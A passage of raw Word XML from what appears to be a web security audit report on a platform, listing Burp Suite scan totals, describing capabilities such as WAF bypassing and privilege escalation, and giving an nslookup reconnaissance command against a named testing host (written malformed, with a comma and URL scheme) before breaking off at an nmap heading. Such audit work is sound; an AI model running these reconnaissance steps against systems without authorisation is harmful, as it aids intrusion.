        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>command log file</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> documenting all tools and techniques used, along with their results and justifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2646E4F3" w14:textId="4506F4E8" w:rsidR="00AA5673" w:rsidRPr="00AA5673" w:rsidRDefault="00AA5673" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5673">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>This security audit will help strengthen the platform’s resilience against cyber threats and improve its overall security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB2011" w14:textId="1291B9D0" w:rsidR="00AB1CE6" w:rsidRDefault="00AB1CE6" w:rsidP="00AB1CE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="007789" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1CE6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="007789" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tools and Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04DCA3" w14:textId="301B03B9" w:rsidR="00E61622" w:rsidRDefault="004814FC" w:rsidP="00E61622">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004814FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool</w:t>
      </w:r>
      <w:r w:rsidR="00E61622">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06413FE7" w14:textId="7063D30A" w:rsidR="004814FC" w:rsidRPr="00E61622" w:rsidRDefault="004814FC" w:rsidP="00E61622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E61622">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp Suite – Automated Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D7AD5" w14:textId="40A41E5E" w:rsidR="00E61622" w:rsidRPr="00E61622" w:rsidRDefault="00E61622" w:rsidP="00AB1CE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004814FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web Application Security Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18062C1E" w14:textId="732DE02D" w:rsidR="004814FC" w:rsidRPr="0079637E" w:rsidRDefault="00E61622" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079637E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004814FC" w:rsidRPr="0079637E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Audit Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363A6A01" w14:textId="41FE0AFE" w:rsidR="00AA5673" w:rsidRPr="00615BFE" w:rsidRDefault="00E61622" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004814FC" w:rsidRPr="00615BFE">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Total audit items: </w:t>
      </w:r>
      <w:r w:rsidR="004814FC" w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0AF586" w14:textId="49F89ACC" w:rsidR="004814FC" w:rsidRPr="00615BFE" w:rsidRDefault="00E61622" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004814FC" w:rsidRPr="00615BFE">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Requests: </w:t>
      </w:r>
      <w:r w:rsidR="004814FC" w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>20340</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539867D1" w14:textId="61576CDB" w:rsidR="004814FC" w:rsidRPr="00615BFE" w:rsidRDefault="00E61622" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004814FC" w:rsidRPr="00615BFE">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Error: </w:t>
      </w:r>
      <w:r w:rsidR="004814FC" w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC5A3EE" w14:textId="05AAB53B" w:rsidR="004814FC" w:rsidRPr="0079637E" w:rsidRDefault="00E61622" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079637E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004814FC" w:rsidRPr="0079637E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B69671E" w14:textId="665C3183" w:rsidR="004814FC" w:rsidRPr="00615BFE" w:rsidRDefault="00E61622" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004814FC" w:rsidRPr="00615BFE">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Total Informational: 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E266D" w14:textId="79E46559" w:rsidR="004814FC" w:rsidRDefault="00E61622" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004814FC" w:rsidRPr="00615BFE">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Total Low: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3BEBD2" w14:textId="77777777" w:rsidR="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Reason:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE0BE4C" w14:textId="5BF5B94E" w:rsidR="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Intercept &amp; Modify Requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Captures and alters HTTP/S traffic between browser and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B326602" w14:textId="63E134E0" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Automated Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Identifies vulnerabilities like SQLi, XSS, SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8FDDDA" w14:textId="1ABCA519" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Manual Testing Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Includes Repeater, Intruder, Sequencer</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Decoder</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> for in-depth testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163EEB1C" w14:textId="20246386" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>API Security Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Imports OpenAPI definitions and tests endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE4EC4" w14:textId="6BA5F809" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Session &amp; Authentication Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Analyzes cookies, tokens, and login </w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> for weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B07485" w14:textId="2A2E4C92" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Bypass Security Controls</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Helps in WAF bypassing, privilege escalation, and fuzzing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1372D874" w14:textId="21DCB900" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Active &amp; Passive Crawling</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Maps web applications and discovers hidden endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BD00EC" w14:textId="1D8794D9" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00AA5673">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Extension Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00040DB4">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Uses Burp Extensions &amp; BApp Store tools for enhanced testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F121CD" w14:textId="77777777" w:rsidR="00040DB4" w:rsidRPr="00040DB4" w:rsidRDefault="00040DB4" w:rsidP="00040DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1500"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6451B52D" w14:textId="77777777" w:rsidR="00836DA3" w:rsidRDefault="00836DA3" w:rsidP="00AA5673">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00E61622" w:rsidRPr="00E61622">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>slookup:</w:t>
      </w:r>
      <w:r w:rsidR="00E61622">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D4BB92" w14:textId="2EC29866" w:rsidR="004814FC" w:rsidRPr="00836DA3" w:rsidRDefault="00836DA3" w:rsidP="00836DA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00836DA3">
        <w:t xml:space="preserve">(Name Server Lookup) is a command-line tool used for querying </w:t>
      </w:r>
      <w:r w:rsidRPr="00836DA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="00836DA3">
        <w:t>records. It helps in gathering subdomains, IP addresses, mail servers, and other DNS information about a target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0793807A" w14:textId="4976CAAE" w:rsidR="004814FC" w:rsidRDefault="00836DA3" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00836DA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: nslookup </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00F02733">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://testing.pinewheel,ai</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01C74F88" w14:textId="40EA1D49" w:rsidR="00836DA3" w:rsidRPr="00615BFE" w:rsidRDefault="00836DA3" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00836DA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Server: 192.168.247.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0719D2E3" w14:textId="1CA0B800" w:rsidR="00040DB4" w:rsidRPr="00615BFE" w:rsidRDefault="00836DA3" w:rsidP="00AA5673">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">     Address: 192.168.247.2#53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C9E8E1" w14:textId="0F905701" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615BFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241338EF" w14:textId="0A9745B2" w:rsidR="00615BFE" w:rsidRPr="00615BFE" w:rsidRDefault="00615BFE" w:rsidP="00615BFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
